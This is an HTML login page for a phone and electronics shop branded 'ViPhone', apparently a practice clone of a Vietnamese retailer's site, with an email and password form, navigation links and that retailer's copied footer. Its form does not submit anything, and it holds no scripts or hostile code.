<!DOCTYPE html>
<html lang="vi" class="">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      <title>ViPhone- Siêu thị điện thoại, Tablet, Laptop, Phụ kiện chính hãng</title>
      <meta name="keywords" content="Thế giới di động, ViPhone, điện thoại di động, ViPhone, smartphone, tablet, máy tính bảng, Laptop, máy tính xách tay, phụ kiện điện thoại, tin công nghệ">
      <meta name="description" content="Hệ thống bán lẻ điện thoại di động, smartphone, máy tính bảng, tablet, laptop, phụ kiện chính hãng mới nhất, giá tốt, dịch vụ khách hàng được yêu thích nhất VN">
      <meta property="og:title" content="ViPhone - Siêu thị điện thoại, Tablet, Laptop, Phụ kiện chính hãng">
      <meta property="og:description" content="Hệ thống bán lẻ điện thoại di động, smartphone, máy tính bảng, tablet, laptop, phụ kiện chính hãng mới nhất, giá tốt, dịch vụ khách hàng được yêu thích nhất VN">
      <link rel="stylesheet" href="css/pay.css">
      <link rel="stylesheet" href="css/chitiet1.css">
   </head>
   <body class="" cz-shortcut-listen="true">
   <section id="wrap_cart">
      <div class="bar-top">
         <a href="#" class="buymore">Trở lại trang chủ</a>
         <div class="yourcart">Đăng nhập thành viên</div>
      </div>
      <div class="wrap_cart">
         <form id="formtest" novalidate="novalidate">
            <div class="infouser ">
               <form action="hihi.php" method="post">
                  <div class="total">
                     <br>
                     <b>Đăng nhập thành viên</b>
                  </div>
                  <div class="areainfo">
                     <input type="email" id="" name="" placeholder="Địa chỉ Email" maxlength="100" value="" class="saveinfo">
                     <input type="password" class="saveinfo" style="" id="" name="" placeholder="Mật khẩu" maxlength="300">
                  </div>
                  </div>
                  <div class="choosepayment">
                     <button type="button" class="payonline" id="dangky" name="btn-dangky">Đăng nhập</button>
                  </div>
               </form>
            <div class="clr"></div>
            

            <style>
               .zalopay {
               background: #f3fbff;
               border: 1px solid #5daeda;
               -moz-border-radius: 4px;
               -webkit-border-radius: 4px;
               border-radius: 4px;
               padding: 6px 10px;
               margin: 0px 30px 20px 30px;
               }
               .zalopay img {
               display: inline-block;
               margin-right: 5px;
               vertical-align: middle;
               }
               .zalopay p {
               display: inline-block;
               width: 70%;
               vertical-align: middle;
               }
               .zalopay p b {
               color: #c10017;
               }
               .zalopay p a {
               color: #288ad6;
               }
               .zalopay a.zalo {
               background: #39b54a;
               -moz-border-radius: 4px;
               -webkit-border-radius: 4px;
               border-radius: 4px;
               padding: 7px 10px;
               color: #fff;
               width: 120px;
               display: inline-block;
               font-size: 12px;
               vertical-align: middle;
               border: 1px solid #36a645;
               text-align: center;
               }
            </style>
            <div class="clr"></div>
         </form>
      </div>
      <p class="provision">Bằng cách đăng ký, bạn đồng ý với <a href="#" target="_blank">Điều khoản sử dụng</a> của </p>
   </section>
   <header>
      <div class="wrap-main">
            <a class="logo" title="#" href="#" aria-label="logo">
            <i class="icontgdd-logo"></i>
            </a>
            <form id="search-site" action="#" method="get" autocomplete="off">
               <input class="topinput" id="search-keyword" name="key" type="text"placeholder="Bạn tìm gì..." autocomplete="off" maxlength="50">
               <button class="btntop" type="submit" aria-label="tìm kiếm"><i class="icontgdd-topsearch"></i></button>
            </form>
            <nav>
               <a href="#" class="mobile" title="Điện thoại di động, smartphone">
               <i class="icontgdd-mobile"></i>Điện thoại
               </a>
               <a href="#/may-tinh-bang" class="tablet" title="Máy tính bảng, tablet">
               <i class="icontgdd-tablet"></i>Tablet
               </a>
               <a href="#/laptop" class="laptop" title="Máy tính xách tay, Laptop">
               <i class="icontgdd-laptop"></i>Laptop
               </a>
               <a href="#/phu-kien" class="phukien" title="Phụ kiện điện thoại di động, phụ kiện tablet, phụ kiện lapto">
               <i class="icontgdd-phukien"></i>Phụ kiện
               </a>
               <a href="#/dong-ho-thong-minh" class="smartwatch" title="Đồng hồ thông minh">
               <i class="icontgdd-watch"></i>Đồng hồ
               </a>
               <a href="#/may-doi-tra" class="maydoitra" title="Máy cũ giá rẻ, máy đổi trả thegioididong">
               <i class="icontgdd-maydoitra"></i><span>Máy</span>Cũ giá rẻ
               </a>
               <a href="#/tin-tuc" class="news" title="Tin công nghệ">
               <i class="icontgdd-news"></i><span>Tin</span>Công Nghệ
               </a>
               <a href="#/hoi-dap" class="ask" title="Hỏi đáp">
               <i class="icontgdd-ask"></i>Hỏi đáp
               </a>
               <a href="#/sim-so-dep" class="cardsim">
               Đăng ký
               </a>
               <a href="#/tien-ich/thanh-toan-tra-gop?" class="utility">
               Đăng nhập
               </a>
            </nav>
         </div>
         <div class="clr"></div>
   </header>
      <footer>
         <div class="rowfoot1">
            <ul class="colfoot">
               <li><a href="#/tra-gop" title="Hướng dẫn mua trả góp">Tìm hiểu về mua trả góp</a></li>
               <li><a href="#/bao-hanh" title="Tìm trung tâm bảo hành">Chính sách bảo hành</a></li>
               <li><a href="#/chinh-sach-bao-hanh-san-pham" title="Chính sách đổi trả">Chính sách đổi trả</a></li>
               <li><a href="#/giao-hang" title="Giao hàng &amp; Thanh toán">Giao hàng &amp; Thanh toán</a></li>
               <li class="showmore"><a href="javascript:ShowMoreFooterSupportLink()" title="Xem thêm">Xem thêm</a></li>
               <li class="hidden"><a href="#/huong-dan-mua-hang" title="Hướng dẫn mua online">Hướng dẫn mua online</a></li>
               <li class="hidden"><a href="#/b2b" title="Mua hàng doanh nghiệp">Bán hàng doanh nghiệp</a></li>
               <li class="hidden"><a href="#/phieu-mua-hang" title="Phiếu mua hàng">Phiếu mua hàng</a></li>
               <li class="hidden"><a href="https://hddt.thegioididong.com/" target="_blank" title="In hóa đơn điện tử" rel="nofollow noopener">In hóa đơn điện tử</a></li>
               <li class="hidden"><a href="#/tos" title="Quy chế hoạt động">Quy chế hoạt động</a></li>
               <li class="hidden"><a href="#/noi-quy-cua-hang" title="Nội quy cửa hàng">Nội quy cửa hàng</a></li>
               <li class="hidden"><a href="#/chat-luong-phuc-vu" title="Chất lượng phục vụ">Chất lượng phục vụ</a></li>
               <li class="hidden"><a href="#/trao-thuong" title="Thông tin trao thưởng">Thông tin trao thưởng</a></li>
            </ul>
            <ul class="colfoot">
               <li><a href="#" target="_blank" title="Giới thiệu công ty (mwg.vn)" rel="noopener">Giới thiệu công ty <span>(mwg.vn)</span></a></li>
               <li><a href="#" target="_blank" title="Tuyển dụng" rel="noopener">Tuyển dụng</a></li>
               <li><a href="#/lien-he" title="Gửi góp ý, khiếu nại">Gửi góp ý, khiếu nại</a></li>
               <li><a href="#/he-thong-sieu-thi-the-gioi-di-dong" title="Tìm siêu thị (1798  shop)">Tìm siêu thị <span>(1798 shop)</span></a></li>
               <li>
                  <a class="viewmb" rel="nofollow" href="javascript:window.location.href=&#39;/op-lung-flipcover/op-lung-galaxy-a7-2018-deo-woven-osmia-den?sclient=mobile&#39;" title="Xem bản mobile">Xem bản mobile</a>
               </li>
            </ul>
            <ul class="colfoot">
               <li>
                  <p>Gọi mua hàng <a href="tel:18001060">1800.1060</a> (7:30 - 22:00)</p>
                  <p>Gọi khiếu nại &nbsp; <a href="tel:18001062">1800.1062</a> (8:00 - 21:30)</p>
                  <p>Gọi bảo hành &nbsp; <a href="tel:18001064">1800.1064</a> (8:00 - 21:00)</p>
                  <p>Hỗ trợ kỹ thuật <a href="tel:18001763">1800.1763</a> (7:30 - 22:00)</p>
                  <a target="_blank" rel="nofollow noopener" class="bct" href="#" aria-label="bộ công thương mwg"><i class="icontgdd-bct"></i></a>
                  <a href="#" title="#" class="dmca-badge"> <img style="opacity:0.01" src="./chititet1_files/dmca-badge-w100-5x1-11.png" alt="DMCA.com Protection Status"></a> 
               </li>
            </ul>
            <ul class="colfoot collast">
               <li>
                  <a target="_blank" href="#" class="linkfb" rel="noopener">
                  <i class="icontgdd-share1"></i>3.3tr
                  </a>
                  <a target="_blank" href="#" class="linkyt" rel="noopener">
                  <i class="icontgdd-share3"></i>561k
                  </a>
                  <div class="group">
                     <label>Website cùng tập đoàn:</label>
                     <a href="#" target="_blank" rel="noopener" class="dm" aria-label="#"><i class="iconlogo-dmx"></i></a>
                     <a href="#" target="_blank" rel="noopener" class="bhx" aria-label="#"><i class="iconlogo-bhx"></i></a>
                  </div>
               </li>
            </ul>
         </div>
         <div class="rowfoot2">
            <p>© 2019. Công ty cổ phần Thế Giới Di Động. GPDKKD: 0303217354 do sở KH &amp; ĐT TP.HCM cấp ngày 02/01/2007. GP số 56/GP-TTDT do Sở TTTT TP HCM cấp ngày 30/07/2018. Địa chỉ: 128 Trần Quang Khải, P. Tân Định, Q.1, TP.Hồ Chí Minh. Điện thoại: 18001060. Email: cskh@thegioididong.com. Chịu trách nhiệm nội dung: Trần Nhật Linh. <a href="#/tos">Xem chính sách sử dụng web</a></p>
         </div>
      </footer>
      <p id="back-top" style="display: none;">
         <a href="#/op-lung-flipcover/op-lung-galaxy-a7-2018-deo-woven-osmia-den#top" title="Về Đầu Trang"><span></span></a>
      </p>
      <!--#endregion -->
      <!--#region Hotjar -->
      <!--#endregion -->
   </body>
</html>